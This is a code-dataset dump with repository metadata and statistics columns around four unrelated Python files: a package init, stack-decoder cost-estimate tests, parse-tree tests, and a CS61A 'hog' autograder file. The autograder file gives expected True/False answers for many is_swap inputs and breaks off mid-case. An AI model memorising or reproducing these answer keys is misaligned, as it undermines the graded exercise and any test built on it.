Hitoshi-FUJII/LIDG
|
8af1f6a64d22c231df41f9a8872c1f52c5db4b1a
|
[
"MIT"
] | null | null | null |
LIDG_v0.3/lidg/model_selection/__init__.py
|
Hitoshi-FUJII/LIDG
|
8af1f6a64d22c231df41f9a8872c1f52c5db4b1a
|
[
"MIT"
] | null | null | null |
import lidg.model_selection.elastic_net
import lidg.model_selection.exhaustive_search
import lidg.model_selection.genetic_algorithm
| 33
| 45
| 0.909091
| 18
| 132
| 6.333333
| 0.555556
| 0.263158
| 0.394737
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 132
| 3
| 46
| 44
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7dcfdbc94a9b4e88400ed6c0f1ffa64a5b2f24ac
| 22,189
|
py
|
Python
|
test/test_stackdecoder.py
|
kenkov/smt
|
db0a9fff15876442f1895b3ef730e91f7c84ad9b
|
[
"MIT"
] | 83
|
2015-01-12T14:40:08.000Z
|
2022-01-07T09:41:09.000Z
|
test/test_stackdecoder.py
|
HimmelStein/smt
|
db0a9fff15876442f1895b3ef730e91f7c84ad9b
|
[
"MIT"
] | 1
|
2016-12-08T21:22:23.000Z
|
2016-12-08T21:22:23.000Z
|
test/test_stackdecoder.py
|
HimmelStein/smt
|
db0a9fff15876442f1895b3ef730e91f7c84ad9b
|
[
"MIT"
] | 38
|
2015-04-08T04:39:13.000Z
|
2021-11-14T13:16:19.000Z
|
#! /usr/bin/env python
# coding:utf-8
import unittest
from fractions import Fraction as Frac
from smt.decoder.stackdecoder import _future_cost_estimate
from smt.decoder.stackdecoder import _create_estimate_dict
from smt.decoder.stackdecoder import ArgumentNotSatisfied
from smt.decoder.stackdecoder import future_cost_estimate
from smt.decoder.stackdecoder import TransPhraseProb
from smt.decoder.stackdecoder import Phrase
# sqlalchemy
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
class DBSetup(object):
def __init__(self, db="sqlite:///:memory:"):
self.db = db
self.tables = [TransPhraseProb, Phrase]
def __enter__(self):
self.engine = create_engine(self.db)
# create tables
for Table in self.tables:
Table.__table__.create(self.engine)
# create session
Session = sessionmaker(bind=self.engine)
self.session = Session()
return self
def __exit__(self, exc_type, exc_value, traceback):
# drop table
for Table in self.tables:
Table.__table__.drop(self.engine, checkfirst=True)
self.session.close()
class FutureCostEstimateTest(unittest.TestCase):
def setUp(self):
self.maxDiff = None
def test_future_cost_estimate_2to1(self):
sentences = u"the tourism initiative addresses this\
for the first time".split()
transfrom = 2
transto = 1
init_val = 100.0
db = "sqlite:///test/:test:"
# data set
dataset = [("1", "the", Frac(-1), 0),
("1", "the", Frac(-2), 0),
# 2
("1", "tourism", Frac(-2), 0),
("1", "tourism", Frac(-3), 0),
# 3
("1", "initiative", Frac(-15, 10), 0),
("1", "initiative", Frac(-25, 10), 0),
# 4
("1", "addresses", Frac(-24, 10), 0),
("1", "addresses", Frac(-34, 10), 0),
# 5
("1", "this", Frac(-14, 10), 0),
("1", "this", Frac(-24, 10), 0),
# 6
("1", "for", Frac(-1), 0),
("1", "for", Frac(-2), 0),
# 7
("1", "the", Frac(-1), 0),
("1", "the", Frac(-2), 0),
# 8
("1", "first", Frac(-19, 10), 0),
("1", "first", Frac(-29, 10), 0),
# 9
("1", "time", Frac(-16, 10), 0),
("1", "time", Frac(-26, 10), 0),
# 10
("1", "initiative addresses", Frac(-4), 0),
("1", "initiative addresses", Frac(-4), 0),
# 11
("1", "this for", Frac(-25, 10), 0),
("1", "this for", Frac(-35, 10), 0),
# 12
("1", "the first", Frac(-22, 10), 0),
("1", "the first", Frac(-32, 10), 0),
# 13
("1", "for the", Frac(-13, 10), 0),
("1", "for the", Frac(-23, 10), 0),
# 14
("1", "first time", Frac(-24, 10), 0),
("1", "first time", Frac(-34, 10), 0),
# 15
("1", "this for the", Frac(-27, 10), 0),
("1", "this for the", Frac(-37, 10), 0),
# 16
("1", "for the first", Frac(-23, 10), 0),
("1", "for the first", Frac(-33, 10), 0),
# 17
("1", "the first time", Frac(-23, 10), 0),
("1", "the first time", Frac(-33, 10), 0),
# 18
("1", "for the first time", Frac(-23, 10), 0),
("1", "for the first time", Frac(-33, 10), 0),
]
val = {(1, 1): -1.0,
(1, 2): -3.0,
(1, 3): -4.5,
(1, 4): -6.9,
(1, 5): -8.3,
(1, 6): -9.3,
(1, 7): -9.6,
(1, 8): -10.6,
(1, 9): -10.6,
(2, 2): -2.0,
(2, 3): -3.5,
(2, 4): -5.9,
(2, 5): -7.3,
(2, 6): -8.3,
(2, 7): -8.6,
(2, 8): -9.6,
(2, 9): -9.6,
(3, 3): -1.5,
(3, 4): -3.9,
(3, 5): -5.3,
(3, 6): -6.3,
(3, 7): -6.6,
(3, 8): -7.6,
(3, 9): -7.6,
(4, 4): -2.4,
(4, 5): -3.8,
(4, 6): -4.8,
(4, 7): -5.1,
(4, 8): -6.1,
(4, 9): -6.1,
(5, 5): -1.4,
(5, 6): -2.4,
(5, 7): -2.7,
(5, 8): -3.6999999999999997,
(5, 9): -3.6999999999999997,
(6, 6): -1.0,
(6, 7): -1.3,
(6, 8): -2.3,
(6, 9): -2.3,
(7, 7): -1.0,
(7, 8): -2.2,
(7, 9): -2.3,
(8, 8): -1.9,
(8, 9): -2.4,
(9, 9): -1.6,
}
with DBSetup(db) as dbobj:
dbobj.session.add_all(TransPhraseProb(lang1p=item[0],
lang2p=item[1],
p2_1=item[2],
p1_2=item[3])
for item in dataset)
dbobj.session.add_all(Phrase(lang1p=item[0],
lang2p=item[1])
for item in dataset)
dbobj.session.commit()
ans = future_cost_estimate(sentences,
transfrom=transfrom,
transto=transto,
init_val=init_val,
db=db)
# assert
self.assertEqual(ans, val)
def test_future_cost_estimate_2to1_argument_not_satisfied(self):
sentences = u"the tourism initiative addresses this\
for the first time".split()
transfrom = 2
transto = 1
init_val = 100.0
db = "sqlite:///test/:test:"
# data set
dataset = [("1", "the", Frac(-1), 0),
("1", "the", Frac(-2), 0),
# 2
("1", "tourism", Frac(-2), 0),
("1", "tourism", Frac(-3), 0),
# 3
("1", "initiative", Frac(-15, 10), 0),
("1", "initiative", Frac(-25, 10), 0),
# 4
("1", "addresses", Frac(-24, 10), 0),
("1", "addresses", Frac(-34, 10), 0),
# 5
#("1", "this", Frac(-14, 10), 0),
#("1", "this", Frac(-24, 10), 0),
# 6
("1", "for", Frac(-1), 0),
("1", "for", Frac(-2), 0),
# 7
("1", "the", Frac(-1), 0),
("1", "the", Frac(-2), 0),
# 8
("1", "first", Frac(-19, 10), 0),
("1", "first", Frac(-29, 10), 0),
# 9
("1", "time", Frac(-16, 10), 0),
("1", "time", Frac(-26, 10), 0),
# 10
("1", "initiative addresses", Frac(-4), 0),
("1", "initiative addresses", Frac(-4), 0),
# 11
("1", "this for", Frac(-25, 10), 0),
("1", "this for", Frac(-35, 10), 0),
# 12
("1", "the first", Frac(-22, 10), 0),
("1", "the first", Frac(-32, 10), 0),
# 13
("1", "for the", Frac(-13, 10), 0),
("1", "for the", Frac(-23, 10), 0),
# 14
("1", "first time", Frac(-24, 10), 0),
("1", "first time", Frac(-34, 10), 0),
# 15
("1", "this for the", Frac(-27, 10), 0),
("1", "this for the", Frac(-37, 10), 0),
# 16
("1", "for the first", Frac(-23, 10), 0),
("1", "for the first", Frac(-33, 10), 0),
# 17
("1", "the first time", Frac(-23, 10), 0),
("1", "the first time", Frac(-33, 10), 0),
# 18
("1", "for the first time", Frac(-23, 10), 0),
("1", "for the first time", Frac(-33, 10), 0),
]
val = {(1, 1): -1.0,
(1, 2): -3.0,
(1, 3): -4.5,
(1, 4): -6.9,
(1, 5): -106.9,
(1, 6): -9.4,
(1, 7): -9.6,
(1, 8): -11.5,
(1, 9): -11.7,
(2, 2): -2.0,
(2, 3): -3.5,
(2, 4): -5.9,
(2, 5): -105.9,
(2, 6): -8.4,
(2, 7): -8.6,
(2, 8): -10.5,
(2, 9): -10.7,
(3, 3): -1.5,
(3, 4): -3.9,
(3, 5): -103.9,
(3, 6): -6.4,
(3, 7): -6.6,
(3, 8): -8.5,
(3, 9): -8.7,
(4, 4): -2.4,
(4, 5): -102.4,
(4, 6): -4.9,
(4, 7): -5.1,
(4, 8): -7.0,
(4, 9): -7.199999999999999,
(5, 5): -100.0,
(5, 6): -2.5,
(5, 7): -2.7,
(5, 8): -4.6,
(5, 9): -4.8,
(6, 6): -1.0,
(6, 7): -1.3,
(6, 8): -2.3,
(6, 9): -2.3,
(7, 7): -1.0,
(7, 8): -2.2,
(7, 9): -2.3,
(8, 8): -1.9,
(8, 9): -2.4,
(9, 9): -1.6,
}
with DBSetup(db) as dbobj:
dbobj.session.add_all(TransPhraseProb(lang1p=item[0],
lang2p=item[1],
p2_1=item[2],
p1_2=item[3])
for item in dataset)
dbobj.session.add_all(Phrase(lang1p=item[0],
lang2p=item[1])
for item in dataset)
dbobj.session.commit()
ans = future_cost_estimate(sentences,
transfrom=transfrom,
transto=transto,
init_val=init_val,
db=db)
# assert
self.assertEqual(ans, val)
def test_future_cost_estimate_1to2(self):
sentences = u"the tourism initiative addresses this\
for the first time".split()
transfrom = 1
transto = 2
init_val = 100.0
db = "sqlite:///test/:test:"
# data set
dataset = [("1", "the", Frac(-1), 0),
("1", "the", Frac(-2), 0),
# 2
("1", "tourism", Frac(-2), 0),
("1", "tourism", Frac(-3), 0),
# 3
("1", "initiative", Frac(-15, 10), 0),
("1", "initiative", Frac(-25, 10), 0),
# 4
("1", "addresses", Frac(-24, 10), 0),
("1", "addresses", Frac(-34, 10), 0),
# 5
("1", "this", Frac(-14, 10), 0),
("1", "this", Frac(-24, 10), 0),
# 6
("1", "for", Frac(-1), 0),
("1", "for", Frac(-2), 0),
# 7
("1", "the", Frac(-1), 0),
("1", "the", Frac(-2), 0),
# 8
("1", "first", Frac(-19, 10), 0),
("1", "first", Frac(-29, 10), 0),
# 9
("1", "time", Frac(-16, 10), 0),
("1", "time", Frac(-26, 10), 0),
# 10
("1", "initiative addresses", Frac(-4), 0),
("1", "initiative addresses", Frac(-4), 0),
# 11
("1", "this for", Frac(-25, 10), 0),
("1", "this for", Frac(-35, 10), 0),
# 12
("1", "the first", Frac(-22, 10), 0),
("1", "the first", Frac(-32, 10), 0),
# 13
("1", "for the", Frac(-13, 10), 0),
("1", "for the", Frac(-23, 10), 0),
# 14
("1", "first time", Frac(-24, 10), 0),
("1", "first time", Frac(-34, 10), 0),
# 15
("1", "this for the", Frac(-27, 10), 0),
("1", "this for the", Frac(-37, 10), 0),
# 16
("1", "for the first", Frac(-23, 10), 0),
("1", "for the first", Frac(-33, 10), 0),
# 17
("1", "the first time", Frac(-23, 10), 0),
("1", "the first time", Frac(-33, 10), 0),
# 18
("1", "for the first time", Frac(-23, 10), 0),
("1", "for the first time", Frac(-33, 10), 0),
]
val = {(1, 1): -1.0,
(1, 2): -3.0,
(1, 3): -4.5,
(1, 4): -6.9,
(1, 5): -8.3,
(1, 6): -9.3,
(1, 7): -9.6,
(1, 8): -10.6,
(1, 9): -10.6,
(2, 2): -2.0,
(2, 3): -3.5,
(2, 4): -5.9,
(2, 5): -7.3,
(2, 6): -8.3,
(2, 7): -8.6,
(2, 8): -9.6,
(2, 9): -9.6,
(3, 3): -1.5,
(3, 4): -3.9,
(3, 5): -5.3,
(3, 6): -6.3,
(3, 7): -6.6,
(3, 8): -7.6,
(3, 9): -7.6,
(4, 4): -2.4,
(4, 5): -3.8,
(4, 6): -4.8,
(4, 7): -5.1,
(4, 8): -6.1,
(4, 9): -6.1,
(5, 5): -1.4,
(5, 6): -2.4,
(5, 7): -2.7,
(5, 8): -3.6999999999999997,
(5, 9): -3.6999999999999997,
(6, 6): -1.0,
(6, 7): -1.3,
(6, 8): -2.3,
(6, 9): -2.3,
(7, 7): -1.0,
(7, 8): -2.2,
(7, 9): -2.3,
(8, 8): -1.9,
(8, 9): -2.4,
(9, 9): -1.6,
}
with DBSetup(db) as dbobj:
dbobj.session.add_all(TransPhraseProb(lang2p=item[0],
lang1p=item[1],
p1_2=item[2],
p2_1=item[3])
for item in dataset)
dbobj.session.add_all(Phrase(lang1p=item[0],
lang2p=item[1])
for item in dataset)
dbobj.session.commit()
ans = future_cost_estimate(sentences,
transfrom=transfrom,
transto=transto,
init_val=init_val,
db=db)
# assert
self.assertEqual(ans, val)
def test__future_cost_estimate(self):
sentences = u"the tourism initiative addresses this\
for the first time".split()
phrase_prob = {(1, 1): Frac(-1),
(2, 2): Frac(-2),
(3, 3): Frac(-15, 10),
(4, 4): Frac(-24, 10),
(5, 5): Frac(-14, 10),
(6, 6): Frac(-1),
(7, 7): Frac(-1),
(8, 8): Frac(-19, 10),
(9, 9): Frac(-16, 10),
(3, 4): Frac(-4),
(5, 6): Frac(-25, 10),
(7, 8): Frac(-22, 10),
(6, 7): Frac(-13, 10),
(8, 9): Frac(-24, 10),
(5, 7): Frac(-27, 10),
(6, 8): Frac(-23, 10),
(7, 9): Frac(-23, 10),
(6, 9): Frac(-23, 10),
}
val = {(1, 1): Frac(-1),
(1, 2): Frac(-3),
(1, 3): Frac(-45, 10),
(1, 4): Frac(-69, 10),
(1, 5): Frac(-83, 10),
(1, 6): Frac(-93, 10),
(1, 7): Frac(-96, 10),
(1, 8): Frac(-106, 10),
(1, 9): Frac(-106, 10),
(2, 2): Frac(-2),
(2, 3): Frac(-35, 10),
(2, 4): Frac(-59, 10),
(2, 5): Frac(-73, 10),
(2, 6): Frac(-83, 10),
(2, 7): Frac(-86, 10),
(2, 8): Frac(-96, 10),
(2, 9): Frac(-96, 10),
(3, 3): Frac(-15, 10),
(3, 4): Frac(-39, 10),
(3, 5): Frac(-53, 10),
(3, 6): Frac(-63, 10),
(3, 7): Frac(-66, 10),
(3, 8): Frac(-76, 10),
(3, 9): Frac(-76, 10),
(4, 4): Frac(-24, 10),
(4, 5): Frac(-38, 10),
(4, 6): Frac(-48, 10),
(4, 7): Frac(-51, 10),
(4, 8): Frac(-61, 10),
(4, 9): Frac(-61, 10),
(5, 5): Frac(-14, 10),
(5, 6): Frac(-24, 10),
(5, 7): Frac(-27, 10),
(5, 8): Frac(-37, 10),
(5, 9): Frac(-37, 10),
(6, 6): Frac(-1),
(6, 7): Frac(-13, 10),
(6, 8): Frac(-23, 10),
(6, 9): Frac(-23, 10),
(7, 7): Frac(-1),
(7, 8): Frac(-22, 10),
(7, 9): Frac(-23, 10),
(8, 8): Frac(-19, 10),
(8, 9): Frac(-24, 10),
(9, 9): Frac(-16, 10)}
ans = _future_cost_estimate(sentences,
phrase_prob)
self.assertEqual(ans, val)
def test__future_cost_estimate_dict_not_satisfied(self):
sentences = u"the tourism initiative addresses this\
for the first time".split()
phrase_prob = {(1, 1): Frac(-1),
(2, 2): Frac(-2),
# lack one value
#(3, 3): Frac(-15, 10),
(4, 4): Frac(-24, 10),
(5, 5): Frac(-14, 10),
(6, 6): Frac(-1),
(7, 7): Frac(-1),
(8, 8): Frac(-19, 10),
(9, 9): Frac(-16, 10),
(3, 4): Frac(-4),
(5, 6): Frac(-25, 10),
(7, 8): Frac(-22, 10),
(6, 7): Frac(-13, 10),
(8, 9): Frac(-24, 10),
(5, 7): Frac(-27, 10),
(6, 8): Frac(-23, 10),
(7, 9): Frac(-23, 10),
(6, 9): Frac(-23, 10),
}
self.assertRaises(ArgumentNotSatisfied,
_future_cost_estimate,
sentences,
phrase_prob)
def test_create_estimate_dict(self):
sentences = u"the tourism initiative addresses this\
for the first time".split()
init_val = Frac(-100)
phrase_prob = {(1, 1): Frac(-1),
(2, 2): Frac(-2),
# lack one value
#(3, 3): Frac(-15, 10),
(4, 4): Frac(-24, 10),
(5, 5): Frac(-14, 10),
#(6, 6): Frac(-1),
(7, 7): Frac(-1),
# lack one value
#(8, 8): Frac(-19, 10),
(9, 9): Frac(-16, 10),
(3, 4): Frac(-4),
(5, 6): Frac(-25, 10),
(7, 8): Frac(-22, 10),
(6, 7): Frac(-13, 10),
(8, 9): Frac(-24, 10),
(5, 7): Frac(-27, 10),
(6, 8): Frac(-23, 10),
(7, 9): Frac(-23, 10),
(6, 9): Frac(-23, 10),
}
correct = {(1, 1): Frac(-1),
(2, 2): Frac(-2),
# lack one value
(3, 3): init_val,
(4, 4): Frac(-24, 10),
(5, 5): Frac(-14, 10),
(6, 6): init_val,
(7, 7): Frac(-1),
# lack one value
(8, 8): init_val,
(9, 9): Frac(-16, 10),
(3, 4): Frac(-4),
(5, 6): Frac(-25, 10),
(7, 8): Frac(-22, 10),
(6, 7): Frac(-13, 10),
(8, 9): Frac(-24, 10),
(5, 7): Frac(-27, 10),
(6, 8): Frac(-23, 10),
(7, 9): Frac(-23, 10),
(6, 9): Frac(-23, 10),
}
ans = _create_estimate_dict(sentences,
phrase_prob,
init_val=init_val)
self.assertEqual(ans, correct)
if __name__ == '__main__':
unittest.main()
| 37.608475
| 68
| 0.301005
| 2,433
| 22,189
| 2.697082
| 0.06494
| 0.03566
| 0.023773
| 0.027431
| 0.810881
| 0.794118
| 0.762877
| 0.753734
| 0.748247
| 0.736208
| 0
| 0.184213
| 0.520979
| 22,189
| 589
| 69
| 37.672326
| 0.433155
| 0.021813
| 0
| 0.764463
| 0
| 0
| 0.052748
| 0.002912
| 0
| 0
| 0
| 0
| 0.012397
| 1
| 0.020661
| false
| 0
| 0.020661
| 0
| 0.047521
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7ddaa1ffe3e9b01657f3c6e3e8f7e64b4d1977ef
| 1,160
|
py
|
Python
|
tests/test_parse_tree.py
|
workingenius/reb
|
ebc597d95f79d6f2d89a401940f24d7a2c4274f0
|
[
"MIT"
] | 1
|
2021-04-27T04:03:21.000Z
|
2021-04-27T04:03:21.000Z
|
tests/test_parse_tree.py
|
workingenius/reb
|
ebc597d95f79d6f2d89a401940f24d7a2c4274f0
|
[
"MIT"
] | null | null | null |
tests/test_parse_tree.py
|
workingenius/reb
|
ebc597d95f79d6f2d89a401940f24d7a2c4274f0
|
[
"MIT"
] | null | null | null |
from reb.parse_tree import PTNode, VirtualPTNode
def test_parse_tree():
text = 'abcdef'
node = PTNode(text, 0, 3, children=[
VirtualPTNode(text, 0, 2, children=[
PTNode(text, 0, 1),
PTNode(text, 1, 2),
]),
])
assert node.children == [
PTNode(text, 0, 1),
PTNode(text, 1, 2)
]
def test_parse_tree2():
"""Empty nodes are hidden"""
text = 'abcdef'
node = PTNode(text, 0, 3, children=[
VirtualPTNode(text, 0, 2, children=[
PTNode(text, 0, 1),
PTNode(text, 1, 1),
PTNode(text, 1, 2),
]),
])
assert node.children == [
PTNode(text, 0, 1),
PTNode(text, 1, 2)
]
def test_parse_tree3():
text = 'abcdef'
node = PTNode(text, 0, 5, children=[
PTNode(text, 0, 3, children=[
VirtualPTNode(text, 0, 2, children=[
PTNode(text, 0, 1),
PTNode(text, 1, 2),
])
]),
])
assert node.children == [
PTNode(text, 0, 3, children=[
PTNode(text, 0, 1),
PTNode(text, 1, 2),
]),
]
| 21.090909
| 48
| 0.474138
| 133
| 1,160
| 4.082707
| 0.18797
| 0.331492
| 0.222836
| 0.279926
| 0.839779
| 0.839779
| 0.777164
| 0.777164
| 0.777164
| 0.718232
| 0
| 0.06069
| 0.375
| 1,160
| 55
| 49
| 21.090909
| 0.688276
| 0.018966
| 0
| 0.785714
| 0
| 0
| 0.015887
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 1
| 0.071429
| false
| 0
| 0.02381
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
819d8fc0de89324ea911d9528a3377738a4b2722
| 18,342
|
py
|
Python
|
hog/tests/04.py
|
jamespeace/cs61a-1
|
6203e030e699b290bd93138beb4ede33f9c3c5f1
|
[
"Apache-2.0"
] | null | null | null |
hog/tests/04.py
|
jamespeace/cs61a-1
|
6203e030e699b290bd93138beb4ede33f9c3c5f1
|
[
"Apache-2.0"
] | null | null | null |
hog/tests/04.py
|
jamespeace/cs61a-1
|
6203e030e699b290bd93138beb4ede33f9c3c5f1
|
[
"Apache-2.0"
] | 1
|
2019-11-18T13:15:31.000Z
|
2019-11-18T13:15:31.000Z
|
test = {
'name': 'Question 4',
'points': 2,
'suites': [
{
'cases': [
{
'code': r"""
>>> is_swap(2, 4)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(22, 4)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(28, 4)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(124, 2)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(44, 28)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(2, 0)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(10, 0)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(100, 10)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(14, 2)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(27, 72)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(104, 2)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(66, 6)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(11, 1)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(13, 301)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(559, 629)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(777, 707)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(527, 493)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(664, 249)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(174, 439)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(670, 720)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(713, 227)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(444, 44)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(530, 270)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(348, 638)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(290, 360)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(326, 683)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(352, 146)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(176, 74)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(57, 587)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(757, 908)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(772, 297)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(186, 322)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(275, 120)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(817, 708)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(994, 6)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(240, 850)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(904, 479)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(192, 12)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(899, 192)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(318, 474)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(622, 216)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(906, 689)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(785, 57)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(250, 980)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(441, 104)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(599, 16)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(306, 229)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(391, 728)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(584, 495)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(696, 646)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(287, 257)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(951, 941)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(97, 967)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(966, 69)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(219, 7)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(931, 908)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(435, 860)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(320, 255)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(419, 753)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(270, 490)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(354, 642)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(479, 656)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(563, 337)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(685, 424)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(480, 907)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(57, 485)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(907, 987)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(822, 892)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(73, 713)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(37, 347)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(927, 799)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(950, 50)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(227, 27)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(432, 841)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(951, 91)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(530, 930)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(24, 593)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(116, 139)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(998, 119)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(117, 575)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(828, 631)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(985, 905)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(915, 539)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(203, 969)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(214, 114)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(367, 337)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(787, 46)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(146, 942)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(859, 137)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(368, 19)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(385, 335)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(213, 186)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(250, 950)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(213, 186)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(902, 603)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(42, 801)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(892, 474)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(535, 807)
